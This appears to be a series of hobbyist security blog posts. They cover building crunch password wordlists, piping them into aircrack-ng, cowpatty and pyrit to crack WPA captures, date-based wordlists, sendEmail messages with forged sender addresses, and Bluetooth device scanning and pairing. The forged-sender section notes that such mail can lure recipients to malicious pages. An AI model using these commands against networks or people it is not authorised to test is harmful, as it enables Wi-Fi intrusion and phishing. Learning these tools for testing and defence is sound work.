As the -p switch can read the input on command line as being letters or words, it MUST be the last option used;
If for instance trying to suppress the size output message using the -u switch and placing the -u switch last,
crunch will see 2 words (abcd + -u) and so will only print out the 2 permutation possibilities as well as actually recognizing the -u switch ;
./crunch 1 1 -p abcd -u

So to ensure the output is as expected, the -p switch MUST always be the last option, and the correct syntax
with the above example would be ;

./crunch 1 1 -u -p abcd

Using the -q switch, you can create all possible permutations of words in a text file ;
(as always, beware of the possible size ! This best done on a 'focussed' wordlist)

As an example, create a small text file with 3 lines and then run crunch over it with the -q option;

echo "bird" > test.txt && echo "cat" >> test.txt && echo "dog" >> test.txt

./crunch 1 1 -q test.txt

RESUMING WORDLIST CREATION AFTER CANCELLATION

crunch allows a wordlist creation to be stopped and restarted, to do this we use the -r (resume) switch.
For this to work we must type the exact same line followed with the -r switch ;

./crunch 8 8 0123456789 -o test.txt

Stop the creation with a Ctrl C, then restart with ;

./crunch 8 8 0123456789 -o test.txt -r

If the wordlist was started from a specific position (see below chapter) then
when resuming the -s switch as well as input must be removed ;

When using this method, the notification on %% complete will not be accurate.
Also, when resuming, crunch will advise that it is generating xx amount of data and xx number of lines.
This information will not be correct as the calculation process thinks it is resuming from a creation of an entire wordlist, whereas it is of course resuming from a wordlist with a certain startblock.
The below picture probably explains it better..

./crunch 8 8 0123456789 -s 59999999 -o test.txt

After cancelling with a Ctrl C, resume would then be done with ;
./crunch 8 8 0123456789 -o test.txt -r

STARTING FROM A SPECIFIC POSITION

If we want to start crunch from a specific position in the wordlist we want to create, we can use the -s
switch to use a specific startblock as starting position for the wordlist.

For instance, if you started creating a wordlist, but had to cancel and resume on a different disk or HDD space ran out.
The temporary file that crunch uses for the wordlist creation is "START" located in the crunch directory

/pentest/passwords/crunch/

You can check this temporary file for the last couple of entries to allow you to move/rename the temp file START
and restart the wordlist creation without losing the work already done.

example ;

./crunch 7 7 0123456789 -o test.txt

> Ctrl + C stopping the wordlist creation,
> check the last couple of entries in the START temporary file ;

tail -n 2 START

> copy or rename the temporary file to a name of your liking;

cp START file1.txt

> restart the wordlist creation from the last noted entry in the temporary file;

./crunch 7 7 0123456789 -s 9670549 -o test.txt

NOTE! crunch will overwrite START when it starts a new wordlist creation process, so be sure to rename START into whatever you want to ensure you don't lose the work already done !

Of course using the starting block can be used for whatever reason, for instance if you are sure that you don't need any list with numbers starting before 59999999 ;

./crunch 8 8 0123456789 -s 59999999 -o test.txt

CREATING CUSTOM PATTERNS

This is where crunch really shines, and in my humble opinion, the most powerful capability that crunch has to offer.

With a minimum amount of information on known or expected patterns and/or possible characters in the passphrase, custom patterns can be created allowing to specify what to place where in the created passhprases.
In doing so the size of the wordlist can be reduced significantly and the wordlist can be tailored to the target in a much more efficient way, which is always to be endeavoured !

To fix a pattern, we use the -t switch in crunch.

There are fixed symbols used for certain character sets ;
@ --> Lower case alpha values (or @ will read and print from a specified character set, see further down in post)
, --> Upper case alpha values
% --> Numeric values
^ --> Special characters including 'space'

So if we want to create a 6 character, lower alpha wordlist and with a pre-fix of 'dog';

./crunch 6 6 -t dog@@@

or if we want 'dog' to be appended ;

./crunch 6 6 -t @@@dog

or have 'dog' bang in the middle ;

./crunch 7 7 -t @@dog@@

Or 'dog' followed by an upper case alpha, number and symbol;

./crunch 6 6 -t dog,%^

Miscellaneous patterns
We can also combine the various fixed character sets, for instance, if we want to create an 8 character
wordlist with alpha, numeric and special characters in fixed positions;

./crunch 8 8 -t ,,^^@@%%

Using the fixed character sets you can quickly and easily make 'quick' wordlists for a single character set..

Creating a wordlist with only lower case;
./crunch 4 4 -t @@@@

only numeric;
./crunch 4 4 -t %%%%

or only uppercase;
./crunch 4 4 -t ,,,,

only special characters;

./crunch 4 4 -t ^^^^

And of course if certain positions and characters are known, it can all be mixed up ;
./crunch 9 9 -t %%DOG^^@@

We can also even go a step further and specify which range of characters should be used for each character type.
In the below example ;
lower alpha values to only be ; abcdef
upper alpha values to only be ; ABCDEF
numeric values to only be ; 12345
special characters to only be ; @#$%

We can then specify same by entering these values manually in the command line ;

Note that it is required to enter the custom values in the order ;

lower alpha -- upper alpha -- numeric -- special characters

./crunch 8 8 abcdef ABCDEF 12345 @#$%- -t @@,,%%^^

If there is no specific character range to be used for the character set, then that position should be
completed with a '+' placeholder sign which signifies the usage of the complete standard character set for that set positon. (lower alpha -- upper alpha -- numeric -- special characters)

The below example is using 'abcdef' as lower alpha charset, the full upper case charset, '12345'as numeric charset and the full special character charset.

./crunch 8 8 abcdef + 12345 + -t @@,,%%^^

Although in the above examples @ is used as fixed character set for lower case values, we can also use it to specify a manually chosen single set of all types of characters ;

./crunch 8 8 123abcDEF -t TEST@@@@

./crunch 10 10 123abc+-= -t @@@test@@@

Remember that certain characters on some occasion require escaping, if in doubt, better to just do it.

./crunch 10 10 123abcDEF\!\@\# -t TESTING@@@

If you want to include a space in the charset, then enclose the charset in quotes ;
(space at end of charset below)

./crunch "123abcDEF " -t TEST@@@@

Creating telephone lists
You can also use the -t switch to easily make lists of telephone numbers, so if for instance the telephone number
is usually noted as for instance; 0131-321654, then you could easily create a wordlist of telephone numbers following that same example ;

./crunch 11 11 -t 0131-%%%%%%

Or if the layout is different, for instance including a space such as "(01201) 111111" this is achieved by putting quotes on the -t pattern as follows (this to ensure that the space is included);

./crunch 14 14 -t "(01201) %%%%%%"

Endless variations are possible.

The possiblities crunch offers to create patterns with such detail give you many options to really fine-tune what you want placed where in your passphrase wordlist and thus reduce the size of your final wordlist.

ESCAPING / FIXING SPECIAL CHARACTERS FOR USE IN PATTERNS

When you start manually defining what to place where with special characters, you will on some occasions need to to 'escape' characters to allow crunch to read them correctly.

This is the case for for instance an exclamation mark ! ;

./crunch 4 4 -t 12!@

will result in an error.
In order to make it work correctly you must 'escape' the exclamation mark ;

./crunch 4 4 -t 12\!@

As some special characters are used to define character sets, this can cause some limitations when trying to fix positions of certain special characters. Such as wanting to use @ as a fixed character ;
./crunch 4 4 -t 012@
or
./crunch 4 4 -t 012\@
This will not fix the character '@' but use it to provide lower case alpha values.

To remedy this to some extent, since crunch v3.0, the new -l switch can be used to fix the literal character instead of having it refer to a place holder for a specific character set.

This would now be accomplished by doing ;

./crunch 6 6 -t b@d%%% -l @

Other possibilities;

./crunch 8 8 -t P@SS%%%% -l @

./crunch 8 8 -t P@\$\$,,,, -l @

etc. etc.

./crunch 8 8 -f charset.lst mixalpha -t pass^^@@ -l ^

Also, more than 1 placeholder character can be fixed as a literal character;

./crunch 8 8 -f charset.lst mixalpha -t pass@,%^ -l %^

Of course this in itself also has limitations as you are not able to to check for all possible lower case alpha
values or passthrough a user defined charset with a fixed setting of the @ character.
The below 2 examples will obviously only return 1 result as all the instances of the @ character will be fixed
as a literal character.

./crunch 8 8 -t p@ss@@@@ -l @

./crunch 8 8 -f charset.lst mixalpha-numeric -t p@ss@@@@ -l @

This is an issue that is being looked into and possibly a following update of crunch will have an answer.

Of course there are workarounds for some part; if for instance you wanted a password list to start with "p@ss"
followed by 4 characters of all possible lower case values, you could create a list of 4 characters;

./crunch 4 4 -o test.txt

And then use 'sed' or 'awk' to place the word 'p@ss' in front of each line ;
Using sed ;

sed 's/^/p\@ss/' test.txt > file1.txt

Using awk ;

awk '{print "p@ss" $0}' test.txt > file1.txt

So with a bit of imagination and a couple of oneliners with sed or awk, you should still
be able to create more or less what you want.

edit 25-05-2011
bofh28 has informed me of another workaround which can be used.

You can override the standard characters per placeholder setting by entering a different type of
charset in a different position and then using the placeholder character for that position.

Normally the 3rd position is for numeric values, however if you specify lower case values, it will use these
characters, however you then do need to use the place holder for that position, in this example %.

Confused ? You won't be after this episode of .. ;)

./crunch 8 8 + + abcdefghijklmnopqrstuvwxyz + -t p@ss%%%% -l @

PIPING CRUNCH THROUGH TO OTHER PROGRAMS

Crunch can be used to pipe passwords through to programs such as aircrack / pyrit / cowpatty etc.

Considering that crunch is now advising the estimated size of wordlists to be created following the command given as well as the wordcount, to have a seamless integration with piping, it is recommended to use the -u option to supress that information on size, wordcount etc.;
Without using the -u command, it is possible that unexpected errors occur with some programs.

Using the -u option will result in the creating of the wordlist directly instead of giving the 3 second delay during which the estimated wordlist size and wordcount is shown ;

In examples only testing for 8 character numeric passwords ;
aircrack
./crunch 8 8 -t %%%%%%%% -u | aircrack-ng -e SSID -w - /pathto/capfile.cap

cowpatty
./crunch 8 8 -t %%%%%%%% -u | cowpatty -f - -r /pathto/capfile.cap -s SSID

pyrit
./crunch 8 8 -t %%%%%%%% -u | pyrit -i - -r /pathto/capfile.cap -e ESSID attack_passthrough

COMPRESSING OUTPUT FILES

Output files can be compressed with crunch using the -z switch.

Supported formats are;
> gzip
> bzip
> lzma

Crunch will first create the wordlist and will then compress the wordlist.
Upon the finalisation of the wordlist creation, you will see the 100% being reached
and the 100% denomination will continue to be printed until the compression is complete.

So if you see a continuous 'stream' of 100%, don't worry, the program is not hanging,
the output file is simply being compressed.
It had me guessing when I was testing a compression of a couple of gigabytes.. but I assure you it is the case.

The best level of compression and thus the slowest is obtained with lzma.
The quickest compression, with the lowest level of compression, is obtained with gzip.

./crunch 6 6 -f charset.lst lalpha -o test.txt -z gzip

To unzip the created file ;
gunzip test.txt.gz

./crunch 6 6 -f charset.lst lalpha -o test.txt -z bzip2

To decompress the created file ;

bunzip2 test.txt.bz2

./crunch 6 6 -f charset.lst lalpha -o test.txt -z lzma

To decompress the created file ;

unlzma test.txt.lzma

= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =

If you managed to come this far, well done, you are a patient / dedicated person :)
Hope it wasn't too boring to go through ;)

bofh28 has once again done a fantastic job in reaching the 3.0 milestone and
a little birdy tells me there is yet more to come :D
If and when revisions come out, I will try to keep this post updated to reflect the changes / additions.

Keep up the great work bofh28 !!

Getting to grips with WiFi

2011-05-04T16:26:00.001+02:00

WIRELESS ONE O ONE

This is just really a shout-out to the fantastic work that Vivek is doing on his site;

http://www.securitytube.net/

He is currently creating a megaprimer on the various uses of the wireless capabilities
and I strongly suggest you take a look at his videos on the subject.

It now stands at 18 videos (as from today 04-05-2011) and it is a very detailed
look at how things work and what vulnerabilities are out there that you should be
aware of.

His videos are very clear and detailed and worth your time in checking them out.

Go for it and learn a lot at ;

http://www.securitytube.net/

Creating wordlists based on dates

2011-03-03T21:55:00.034+01:00

wordlists based on dates
======================

Update 4
23-12-2011
Have now released datelist v0.6
- Not limited to any dates anymore (yay !)
- Much faster
- Included more error checks
- Totally awesome ;)
DOWNLOAD;
http://www.mediafire.com/file/9zhrts9466g3v6i/datelist_v0-6

Update 3

02-04-2011

==========

So have completed the work on v0.4, vid & download location herebelow.

Its still slow and limited to 1902 -- 2037 dates, but seems a bit better

(to look at at least :) )

Until I get to grips with Python or Perl enabling me to massively increase the speed

it will probably stay as it is now.
edit 01-05-2010;
Gitsnik put his mind to it (probably whilst reading the paper on the john, things come easier to him ;) )
and wrote a fantastic bit of perl that does it sooo much faster and without any date limitations, when I manage
to replicate that will put it up as well.

Or on bliptv ;
http://blip.tv/file/4969508

Download code datelist_v0.4

Version 0.4 is superceded by v0.6, so grab the code from the link at the top of the page.

Update 2

=======
Am working on v0.4 to be able to do the same directly from command line, should be less
invasive on the eyes for the command line freaks and hopefully a tad quicker.

Update 1

=======
http://www.mediafire.com/file/f9fd8chsthy4p7d/datelist_v0.3

Put up a quick video on a revision; datelist_v0.3

=======

I occasionally get queries on how to create certain wordlists with crunch, for which in some cases
crunch is not really suited.
This is the case when dealing with dates for instance.

I had asked bofh28 (author of crunch) whether he felt that this was something to consider for inclusion
in crunch, however he did not feel this was within the scope of what crunch is intended for and of course
he's right, crunch's scope is meant to create a true bruteforce list.

So, after having had a few queries on it, I dabbled a bit in how this could be done.

After quite a bit of brain teasing (I am a slow learner ;) ) I got a date list in the format ddmmyyyy with the following code ;
>copy/paste the below code and save as for instance date-test
>make executable with: chmod 755 date-test to allow to run it; ./date-test

#!/bin/bash -e
#Starting and stopping dates
echo "Enter the starting date"
echo "must be in the format yyyy-mm-dd"
(tput bold && tput setaf 1)
read START_DATE
(tput sgr 0)
echo "Enter the ending date"
echo "must be in the format yyyy-mm-dd"
(tput bold && tput setaf 1)
read END_DATE
(tput sgr 0)
# List all dates in between the chosen dates in the format ddmmyyyy
echo $START_DATE | tee r_dates.txt
while true
do
START_DATE=$( date +%Y-%m-%d -d "$START_DATE -d 1day" )
echo $START_DATE | tee -a r_dates.txt
if [ "$START_DATE" == "$END_DATE" ]
then
awk -F- '{print $3 $2 $1}' r_dates.txt > datelist.txt
rm r_dates.txt
echo
(tput setaf 2 && tput bold)
echo "wordlist 'datelist.txt' created in the format ;"
echo
(tput setaf 6 && tput bold)
head -5 datelist.txt
(tput sgr 0)
echo ""
exit
fi
done

Not an easy few lines for me to remember.. at least for me..
So after having done that, there was some desire to be able to change the output format to other formats,
we each have our own preference !

Going through it a bit more and trying to improve it I came up with datelist v0.2
Now I am sure there must be easier ways to accomplish the same thing.. but it just simply escaped me..

Basically a pretty untidy mess code-wise, but it seems to more or less do the trick.

Following a query on how to make a certain wordlist, I also included a possibility
to either prepend or append additional numbers (max 5) to the created wordlist.
I am not sure that the way it is done is the most effective and will probably re-visit that part.

If anyone feels like having a shot at trying it out, you can download it here;
Edit 23-12-2011
All previous versions superceded by v0.6, see download link at top of page.

Starting it up (of course use filename that is appropriate for the download you have done);

./datelist

Starting with format option -1 used and entering the Start and End dates ;

./datelist -1

Starting ..

Upon completion of the creation of datelist.txt, the 1st 5 lines of the created file will be shown to confirm
the output format.

APPENDING OR PREPENDING SEQUENTIAL NUMBERS

I also included a method of appending or prepending upto 5 sequential numeric values(0-9) to the created datelist.txt file.
Not quite sure how useful this is or to whom.. not really for me, but hey, the question came up ;)

This can be done with the -a (append) or -p (prepend) after having created the datelist.txt file.

Appending 2 numeric characters sequentially with the -a switch and showing the result by showing the last
5 lines of the file.

./datelist -a

Prepending 2 numeric characters sequentially with the -p switch and showing the result by showing the last
5 lines of the file.

./datelist -p

Again, this is all just a bit of fun and most likely ludicrously funny to anyone able to really write,
but who knows it may be of use to someone ;)

Video showing the use of datelist (v0.3)

http://blip.tv/file/4842595
or
http://www.youtube.com/watch?v=FEXbxbjh-eU

Dont be shy on commenting if its any help or simply worthless :D

sendEmail

2011-02-15T16:13:00.002+01:00

FUN WITH EMAIL

sendEmail in installed by default on the backtrack OS, and the options can simply be checked by typing ;

sendEmail

Make sure your ISP does not have any problems with the use of sendEmail prior to sending loads of mails
to your roomate from MeganFox@movieworld.com ..

This is by no means an anonymous emailing method, there will always be IP address details mentioned in the email headers and you need to specify the smtp server to use.
You can specify to use the smtp server of the connection you have in place, or you can specify to use for instance the gmail smtp server.
When using the gmail smtp server however, the gmail address will be seen as the reply address.

Also, it is quite likely that some of the messages made such as the below examples will be picked up as spam..
YMMV depending on how often you test on certain addresses.

In any case, for an unsuspecting, not too savvy recipient.. it can lure the recipient to malafoid webpages or entice to open attachments etc.

SENDING BASIC EMAIL

So lets start off by creating a simple message, sending it to my gmail account using my ISP's smtp server;
(do a google on smtp servers to find the one your ISP is using)

-f   From (sender) email address
-t   To email address
-u   Subject (in quotes)
-m Message body
-s   smtp server

I will seperate the commands partially using backslash \ as I get confused with long lines :)

It is important to note that some special characters such as an exclamation mark, can cause problems in the subject line / message line depending on single or double quotes used.

sendEmail -f megan.fox@movieworld.com -t MyEmail@gmail.com \
-u "Enjoyed meeting you at the party good-looking ;)" \
-m "We sure had a good time didnt we, cant wait to see you again .. " \
-s smtp.isp

As received in gmail (this one got caught as being spam as I had tested it a few times in quick succession) ;

Now my better half would never believe that I actually met Megan Fox at a party or that she was so thunderstruck by my charming self she thought it necessary to email me..
But hey, you get the idea ;)

USING STDIN FOR MESSAGE INPUT

If we want to be able to write a bit more in the email body, simply leave out the -m option, and sendEmail will read from STDIN, you will be prompted to enter a message after entering the command and then press Ctrl+D
(on its own line) to have it read and then sent ;
Lets use an example which the better halves will appreciate a bit more, like sending an email to your wife on Valentine's Day.. yeah...what a romantic..

sendEmail -f Secret.Admirer@secret.com -t BetterHalf@gmail.com \
-u "Will you be my valentine?" \
-s smtp.isp

You will then be presented with;
Reading message body from STDIN because the '-m' option was not used.
If you are manually typing in a message:
- First line must be received within 60 seconds.
- End manual input with a CTRL-D on its own line.

So type the desired message and when finished make sure you hit enter to get to a free / blank line, then
hit CTR+D ;

Roses are Red

Violets are Blue

Sugar is Sweet

And so are You !

Ctrl+D

As received in gmail ;

Now if that doesn't get an appreciative smile / freebie to grab another beer, then you must have really been snoring the night before..

SENDING EMAIL WITH MESSAGE PRE-PREPARED IN TXT FILE

You can also prepare a written message and have sendEmail enter this as the message body ;

nano valentine

Will you be my Valentine ?

===================

Roses are Red
Violets are Blue
Sugar is Sweet
And So Are You !

HAPPY VALENTINE'S DAY !

Save and Exit; Ctrl+X --> Y

sendEmail -f secret.admirer@secret.com -t BetterHalf@gmail.com \
-u "Will you be my valentine?" \
-o message-file=valentine \
-s smtp.isp

As received in gmail ;

USING GMAIL'S SMTP FOR SENDING MAIL

In order to use gmail's smtp server, you have to specify your gmail username (with -xu) & password (with -xp).

An example herebelow ;

sendEmail -f DesiredEmail@whatever.com -t YourEmail@testaccount.com \

-u "Testing Gmail smtp" \

-m "Just a test for the gmail smtp" \

-s smtp.gmail.com \

-xu your.gmail@gmail.com \

-xp gmailpassword

When sending the message, the return address will always be your gmail account, also, the sent message will be stored in the gmail account being used.

Of course there are quite a few more options, adding cc's / bcc's, including attachments, etc etc.

Just a bit of fun, but goes to show that checking where certain emails come from is not a bad idea.

Especially if they include links to sites or attachments..

Wordlist Sizes

2010-09-27T09:50:00.018+02:00

The post on creating wordlists with crunch v2.4 receives the most hits by far on my blog and from the
queries in the comments section, it would seem that not everyone realises what the potential size can be
when creating wordlists.

EDIT

====

Check out the latest revision of crunch, bofh28 just released v2.6 03-10-2010.
Crunch is now including a size estimate when starting up the wordlist generation, so you can see what size the wordlist you are planning will be.
That along with a few more new nice additions.
Download the latest crunch here;
http://sourceforge.net/projects/crunch-wordlist/

Edit

latest revision of crunch now also included in the backtrack 4 repository.

Lets say you are working on a wordlist for a WPA key (which always have a minimum of 8 characters)
and lets say that you know for a fact that the passkey in question is an eight character combination of the following digits and letters;

0123456789ABCDEF

(like some internet companies have on their broadband modem/routers where I am from).

To create a wordlist with all possible combinations based on the passphrase having 8 characters only,
you could use the following syntax in crunch;

./crunch 8 8 0123456789ABCDEF -o wpa-list.txt

That one line of code seems so simple, yet when you check the estimated size of the wordlist to be created
you would definately think twice about trying to create, save and use it...

The size of the wordlist can be calculated as follows ;

(x^y) * (y+1) = size in bytes
x = The number of characters being used to create the wordlist
y = The number of characters the words/passphrases in the wordlist have.

Based on the above example, we have 10 possible numeric values and 6 possible alpha values,
so 16 characters in total, and we want to calculate based on a wordlist wherein the passphrases have 8 characters.
To calculate what the size would be in konsole we can use "bc" ;

echo "(16^8)*(8+1)" | bc

Or we can even just type it in google; (16^8)*(8+1)
and it will return the same result ;

Next we can check the conversions of the resulting size in KB / MB / GB etc. ;

thats quite a lot...

I put together a (very!) simple script in order to be able to quickly check what kind of size one
is looking at when thinking of creating a wordlist with the same min/max length in crunch;

crunch_size

DOWNLOAD

http://www.mediafire.com/file/dmh989dhmebch43/crunch_size-v0.2

After saving to your /root/ directory for instance, just run by entering ;

./crunch_size-v0.2

You need to enter ;
> the number of characters to be used when creating the wordlist. (using the above example; 16)
> the length of the words/passphrases in the wordlist. (using the above example; 8)

You cant choose to check what the results would be with any fixed patterns, or variables, (have to leave the hard stuff like that to the pro's !) but it is still an eye-opener to see the sizes involved with a 'simple' wordlist.

The result will show you the expected number of words/passphrases in the wordlist along with the estimated
file size in bytes / Kilobytes / Megabytes / Gigabytes / Terabytes / Petabytes

Just a bit of fun and possibly handy to have in your crunch directory for reference ;)

Please comment if I messed up on the calculations anywhere..

Bluetooth mayhem -- part III -- bluejay

2010-09-19T12:54:00.021+02:00

UPDATE

=======

Uploaded a revision to bluejay bluetooth scanner;
Download link below

VIDEO of an update again ;

http://blip.tv/file/4240113

File download;
http://www.mediafire.com/file/6eacv5yez0eyv2z/bluejay

Regrettably, the mayhem I was able to enjoy with bluetooth has basically been limited to scanning..

All in all a rather disappointing outcome after quite a bit of time spent trying to get somewhere.

I have tried to get the famous bluebugger & bluesnarfer to work, however the phones I have to test on do not seem to be vulnerable to the standard attacks and the tools do not seem to be well suited to Backtrack 4 without some serious tweaking.

The bluetooth headsets I got don't seem to show up on any of the scans I do, so I couldn't even test carwhisper either.
Bummer...
Am going to continue to pick up cheapo headsets though as I would love to at least get something working...

There is a serious lack of information on using bluetooth tools with backtrack 4 and I had hoped to be able to contribute to getting some more information out there, however for the time being I have to admit defeat on this one...

The plus side of things is that it motivated me to write my own bluetooth scanner :D

Considering that tools like ghettotooth are still included in backtrack 4, I saw no harm in making something similar, may even propose for it to be included if I am feeling cocky...

So after a lot of trial and error and a hell of a lot of google, my first bash script ; bluejay

Hopefully someone finds it fun to use, I had a lot of fun (along with frustration...) writing it.
Although I am sure many looking at the code will probably sh1t themselves laughing, its my first attempt at any bash scripting with a bit of scavenging from teh interwebz... so hey ;)

bluejay was written with backtrack 4 in mind, and is untested on any other platform.

INSTALLATION & RUNNING

(based on using Backtrack 4)

=========================

1. Download file from below link to a location of your choice (for instance /root/ ).
Download link ;
See download link for bluejay v0.3 at top of page.

2. Make a directory called "bluejay" in /pentest/bluetooth/;

mkdir /pentest/bluetooth/bluejay

Note!

Creating the directory /pentest/bluetooth/bluejay/ is required as bluejay puts temp files in that location.

(Latest version of bluejay will ask if you want to and create directory automatically if you choose to continue)

3. Copy or move the file into the created directory;
mv /root/bluejay /pentest/bluetooth/bluejay/bluejay

4. If you can't run bluejay, you may have to change file permissions ;
chmod 755 /pentest/bluetooth/bluejay/bluejay

5. Then run it ! ;

cd /pentest/bluetooth/bluejay/

./bluejay -h

HELP INFORMATION

==================

./bluejay -h

LISTING AVAILABLE INTERFACES

============================

./bluejay -d
Result of listing devices when only 1 bluetooth interface present ;

Result of listing devices when multiple bluetooth interfaces are installed ;

SINGLE SCANS

=============

With only 1 bluetooth interface installed, bluejay automatically chooses this interface,
usually hci0, and starts the scan ;

./bluejay -s

When starting a single scan with multiple interfaces installed, bluejay will prompt for an interface to
be entered ;

./bluejay -s
hci2

CONTINUOUS SCANS

==================

With only 1 bluetooth interface installed, bluejay will automatically take the first one it finds,
usually hci0, and start the scan.
When quitting with Ctrl C, bluejay then prompts whether to save the scan results to log or not (y/n)

If choosing not to save, number of found devices is printed to screen and program exits.

./bluetooth -c

(followed by Ctrl C and "n" to not save results to log)

If you choose to save the scan results, then bluejay will print the number of devices discovered on screen and
save the results to a logfile in /pentest/bluetooth/bluejay/

Saving the scan results to log ;

When starting continuous scans with multiple bluetooth interfaces installed,
bluejay will prompt you to enter the bluetooth interface you want to scan with.

./bluejay -c
followed by entering interface hci1 in this case
then Quitting with Ctrl C and choosing not to save scan results "n"

I am lazy and got fed up with the typing in of the interface names..
So if you just hit Enter where you are prompted to enter the interface to scan with, bluejay will
automatically choose the first interface it finds (usually hci0) and start scanning with that.

./bluejay -c

Enter
Quit with Ctrl C and "n" to not save the scan results.

Le Voilà !!
The logging side of things is regretfully far from perfect;
If clock offset changes, or if name is cached then the BDADDR will show up more than once in the log.
Am working on a revision v0.3 which will hopefully sort a few things out. It was still a fun project though ;)

I am sure there are loads of ways to make it smoother and quicker, comments with advice and on errors
encountered when using it are appreciated.

Despite the fact that I have more or less given up hope on been able to have the same amount of fun with
bluetooth as can be had with wireless, it is an interesting area to look at and I would appreciate any comments
which may assist with bluetooth hacking.

Bluetooth mayhem -- part II

2010-09-08T23:27:00.005+02:00

In the previous post all kinds of methods have been shown to get hold of the all-important bdaddr or MAC address of the bluetooth devices, so here I am assuming that you have, or know how to obtain, the bdaddr of your test device.

After all the scanning is complete and I have found my test subject... what next ?
Well, as always, get more information !

We can get further information on the device's services and channels by fingerprinting with sdptool;

sdptool -i hci0 browse 6C:9B:02:FF:97:2F

Hectic amount of output there... so what do we actually need ?
From what I have read, we want to get the Service Name, the Service RecHandle and the Channel.

So to simplify the output to get what we want, I will use grep -e (egrep) to make it a little more readable ;

sdptool -i hci0 browse 6C:9B:02:FF:97:2F | egrep 'Service Name|Service RecHandle|Channel'

So at this stage we have the bdaddr of the test device and a list of services and channels which we will use when we prepare for a connection.

Next step is preparing a connection with the device, but first some more preparation;

Editing main.conf

================

nano /etc/bluetooth/main.conf
Edit the line under Default device class to the class you want, in this case I am doing cell phone.

Class = 0x500204

No need to edit anything else.

Editing rfcomm.conf
==================

nano /etc/bluetooth/rfcomm.conf

Edit the rfcomm.conf; enable binding, enter bdaddr of the device you want to connect to, enter channel number of the service you want to access, enter the name of the connection.
Delete the hashes where necessary in the original rfcomm.conf file and finally the file should look something
like the below;

Editing file permissions

====================

Edit the permissions of below files in /etc/bluetooth/;

cd /etc/bluetooth/

chmod 755 {main.conf,networking.conf,rfcomm.conf}

Not sure that editing the main.conf, rfcomm.conf and setting the file permissions is absolutely necessary, as you can set the device class in hciconfig and can enter the rfcomm information directly in the command line...
But if you can't tell by now... I'm flying as blind as a deaf bat with this ;)

Best to then restart bluetooth service ;

/etc/init.d/bluetooth restart

Configuring your bluetooth interface with hciconfig

Reference: http://linux.die.net/man/8/hciconfig

===========================================

hciconfig -a hci0 up

Opens and initializes the HCI device
hciconfig -a hci0 class 0x500204
Sets the device's class (0x500204 is for Cell Phone)

hciconfig -a hci0 lm accept, master;

Sets link mode to accept baseband connection and
also to ask to become master when connection request comes in.

hciconfig -a hci0 lp rswitch,hold,sniff,park;

Sets the link policies.
hciconfig -a hci0 name TEST
Sets the name of your bluetooth device

There are various posts on which settings should be enabled, some also mention ;

hciconfig -a hci0 auth enable

hciconfig -a hci0 encrypt enable

This however interfered with sdptool's capability to scan devices for info due to an invalid exchange.
(I assume the due to the device then being set to security mode 3: link level enforced security)
http://www.palowireless.com/bluearticles/cc1_security1.asp

Updating the Service Discovery Protocol Database

Reference: http://linux.die.net/man/1/sdptool

==========================================

For instance;

sdptool -i hci0 add --handle=0x10001 --channel=9 OPUSH

sdptool -i hci0 add --handle=0x10002 --channel=10 FTP

sdptool -i hci0 add --handle=0x10003 --channel=1 DUN

The handles and channels for the services may be different for other phones so check all info with sdptool.

OK, so now that's all done, what am I able to do ?
Well, not so much actually.

It turns out that the above configurations haven't helped me in connections, however knowing the processes is always a good thing ;) and might as well document it !

In all connection attempts, I needed to Accept the connection on the cell phone.

Connecting with rfcomm

References: http://linux.die.net/man/1/rfcomm

http://www.palowireless.com/infotooth/tutorial/rfcomm.asp

=======================================

First to try a connection to the OPUSH service which on my cell is on Channel 9.
As all the information has been entered for this in rfcomm.conf I can enter ;

rfcomm bind 0

rfcomm

rfcomm connect 0

If the address already in use error comes up, then release the device or all devices;
rfcomm release hci0 or rfcomm release all and try again.

I have to accept on cell phone to receive data from 'TEST' (name given to bluetooth interface) and then connection is made.

Its probably better practice though to enter the full code in the command line;

rfcomm bind 0 6C:9B:02:FF:97:2F 9

rfcomm

rfcomm connect 0 6C:9B:02:FF:97:2F 9

(I am still obliged to accept data on the cell phone)

The rfcomm connection attempt fails for most services as there are no means I can find included in BackTrack4, to reply to the PIN request from the phone.

To check & verify on the PIN request response issue;
http://www.linuxquestions.org/questions/slackware-14/slackware-13-bluetooth-pan-759274/

After much googling and reading I found a reference to using simple-agent which is included in Bluez-4.32 package.
I just extracted that file (from the 'test' subfolder) and copying the file simple-agent to for instance /etc/bluetooth/ and running it, it returns Agent registered.

When trying to connect with rfcomm to a service prompts a PIN request from the device, such as the below example for OBEX File Transfer, simple-agent returns with RequestPinCode along with the bdaddr where the request came from and prompts for a PIN.

Enter the PIN that was entered in the device (in this case 0000) and pairing is succesful.

Yay ! Connected !

So what have I actually accomplished with all the above ?
Well, it feels like not very much at all, but at least I am a step closer to understanding the connection methods involved.

With a lot, probably a helluva lot, more time on google and various fora, I hope to be able to learn a bit more about bluetooth hacking.

This truly is a slow process ;)

As always, any insightful comments which may help enable the various bluetooth tools in BackTrack4 greatly appreciated.

On to part III ? !

Bluetooth mayhem

2010-09-06T14:00:00.018+02:00

So this is going to be a post which will probably be either updated when possible or deleted
depending on the progress I am able to make with bluetooth ;)

After getting interested in bluetooth again, I came to the conclusion that I really can't get much done at all..
Considering the amount of cash I have spent in the past on wireless adapters to test, getting a pre-paid mobile and a couple of bluetooth dongles and headsets to go crazy on didn't really seem like a bad idea.

So this will be a post containing some information on the bluetooth side of things that that I have been able to get through, which as it stands right now is horrifically little :|

The bluetooth tools included on BackTrack4 are all somewhat dated and their functionality with BackTrack4 not well documented, though bluetooth still forms a part of many wireless security courses, so I have a feeling it is simply a lack of documentation.

The phone I am using to test on is a Nokia 2720 with bluetooth visibility set to permanently visible (except with the tests of tbsearch & fang)
I have a couple of usb dongles, 2x Class 2 and 1x Class 1.

SCANNING FOR -AND LOGGING BLUETOOTH DEVICES

=============================================

First to ensure that the bluetooth devices are up and running ;

hciconfig

hciconfig hci0 up <-- in my case an internal bluetooth device
hciconfig hci1 up <-- in my case an external USB dongle
etc.

Getting more info on the bluetooth interface ;

hciconfig hci0 -a

There are numerous methods to scan for devices ;

hcitool

---------

hcitool is the most straightforward, comparable with using the iwlist scan option when checking for wireless.

hcitool dev

hcitool -i hci0 scan

hcitool -i hci0 inq

Alternatively you can use one of the many monitoring tools included in BT4 such as ;
BlueScan, Btscanner, ghettotooth, tbear

BlueScan

------------

BlueScan will show bdaddr of the device found along with name, manufacturer, active services and active channels along with time of discovery.
However have not figured out how to specify which interface to use; BlueScan always seems to want to use bdaddr of hci0.
After stopping the scan with Ctrl +C you are given 3 options;
1. Print to screen
